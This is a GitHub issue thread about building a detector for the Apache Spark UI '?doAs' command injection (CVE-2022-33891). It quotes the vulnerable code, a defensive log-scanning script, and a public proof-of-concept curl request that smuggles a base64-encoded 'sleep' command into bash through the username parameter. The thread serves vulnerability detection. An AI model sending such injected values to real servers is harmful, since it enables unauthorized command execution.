Closed maoning closed 5 months ago
Hi @maoning ,
I would like to contribute to this PRP request. Can you assign it to me?
Hi @OccamsXor ,
Thank you for picking up this request! Please make sure the following items are completed before the plugin implementation:
Hi @maoning , @tooryx ,
I sent the PR regarding the vulnerable configuration to Security Testbeds repository. https://github.com/google/security-testbeds/pull/32
The Apache Spark UI has a `spark.acls.enable` configuration option which provides the capability to modify the application according to the user's permissions. When the config is true, the vulnerable versions of Spark check the group membership of the user (which is passed in the `?doAs` parameter) using the vulnerable code below:
```scala
private def getUnixGroups(username: String): Set[String] = {
  // vulnerable line (before apache/spark#36315): username is concatenated into a `bash -c` string
  val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
  // we need to get rid of the trailing "\n" from the result of command execution
  Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
  // replacement in apache/spark#36315: `id` is invoked directly, with username as a separate argument
  // Utils.executeAndGetOutput(idPath :: "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
}
```
Ref: https://github.com/apache/spark/pull/36315/files
Without proper controls, this method allows blind command injection in the `username` parameter, meaning the attacker is not able to see the output of the executed command.
Using the public PoC provided here, we can observe that the application delays the response by 10 seconds:
```console
❯ curl 'http://localhost:8080/?doAs=`echo%20%22c2xlZXAgMTAK%22%20|%20base64%20-d%20|%20bash`'
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 403 User `echo "c2xlZXAgMTAK" | base64 -d | bash` is not authorized to access this page.</title>
</head>
<body><h2>HTTP ERROR 403 User `echo "c2xlZXAgMTAK" | base64 -d | bash` is not authorized to access this page.</h2>
<table>
<tr><th>URI:</th><td>/</td></tr>
<tr><th>STATUS:</th><td>403</td></tr>
<tr><th>MESSAGE:</th><td>User `echo "c2xlZXAgMTAK" | base64 -d | bash` is not authorized to access this page.</td></tr>
<tr><th>SERVLET:</th><td>org.apache.spark.ui.JettyUtils$$anon$1-4ef7e640</td></tr>
</table>
<hr><a href="https://eclipse.org/jetty">Powered by Jetty:// 9.4.36.v20210114</a><hr/>
</body>
</html>
```
We can also observe that the `sleep` command is executed in the container:
The plugin will have these working steps:
- `?doAs` endpoint is returning 403 as expected
- `BLIND_RCE` type
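A defender-side check for the request pattern shown in this thread, as an added example that is not part of the original issue, Spark or the Tsunami project: it scans constructed NCSA-style Spark UI access-log lines (the log format and the account-name pattern are assumptions), flags `doAs` values that are not a plain account name or carry shell metacharacters, and decodes embedded base64 so the analyst sees what `base64 -d | bash` would have run.

```python
# Added example (not from the issue thread, Spark or Tsunami): triage Spark UI
# access-log lines whose ?doAs value could reach `bash -c "id -Gn " + username`.
# Assumes NCSA-style access log lines; the sample below is constructed.
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

SHELL_META = re.compile(r'[`$|;&<>(){}\n]')   # characters that escape the quoted id -Gn string
VALID_USER = re.compile(r'^[A-Za-z_][A-Za-z0-9_.-]*$')  # assumption: POSIX-style account name
LOG_LINE = re.compile(  # client ident user [time] "METHOD target proto" status
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
B64_TOKEN = re.compile(r'[A-Za-z0-9+/]{8,}={0,2}')

# Constructed sample; the second line mirrors the PoC request quoted above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "GET /?doAs=alice HTTP/1.1" 403 1234
10.0.0.7 - - [01/Mar/2024:10:00:09 +0000] "GET /?doAs=`echo%20%22c2xlZXAgMTAK%22%20|%20base64%20-d%20|%20bash` HTTP/1.1" 403 1234
10.0.0.8 - - [01/Mar/2024:10:00:10 +0000] "GET /?doAs=bob%20smith HTTP/1.1" 403 1234
10.0.0.9 - - [01/Mar/2024:10:00:12 +0000] "GET /jobs/ HTTP/1.1" 200 5678
"""

def decode_embedded_base64(value: str) -> list[str]:
    """Decode base64-looking tokens so the analyst sees what `base64 -d | bash` would run."""
    out = []
    for token in B64_TOKEN.findall(value):
        try:
            out.append(base64.b64decode(token, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            pass  # not valid base64; ignore the token
    return out

def scan(log_text: str) -> list[dict]:
    """Return one finding per request whose doAs value is not a plain account name."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get("doAs", []):
            metachars = sorted(set(SHELL_META.findall(value)))
            if metachars or not VALID_USER.match(value):
                findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                                 "doAs": value, "metachars": metachars,
                                 "decoded": decode_embedded_base64(value)})
    return findings
```

Because the injection is blind, the 403 status alone is not a signal (the PoC above also gets a 403); the decoded payload and the metacharacters are what separate an attempt from a mistyped username.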
Hi @OccamsXor,
Thank you for submitting the testing configs to security-testbeds and providing detailed vuln research. Everything looks good. Please submit our participation form and you can start working on the development.
Hi @OccamsXor,
Your PR has been merged. This usually means a reward will be granted. Google will start the internal QC process and the reward amount will be determined based on the quality of the detector report. Please be patient and allow up to a week for the QC process to finish. You'll be notified once the decision is made.
Thanks!
Are there any updates on this issue @magl0 @maoning?
Hi @OccamsXor,
Thanks for your contribution, the reward has been granted!
https://github.com/projectdiscovery/nuclei-templates/blob/b686b1aea279093c30b35486db65a0e9917b66c4/http/cves/2022/CVE-2022-33891.yaml#L4
Please use Tsunami's payload generator like https://github.com/google/tsunami-security-scanner-plugins/blob/ab5e8d213fb7975223af338d2fefee6040d2e6ad/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java#L130-L139 to generate a templated printf string for verification.
Please read the rules of engagement first at https://github.com/google/tsunami-security-scanner-plugins/issues/409.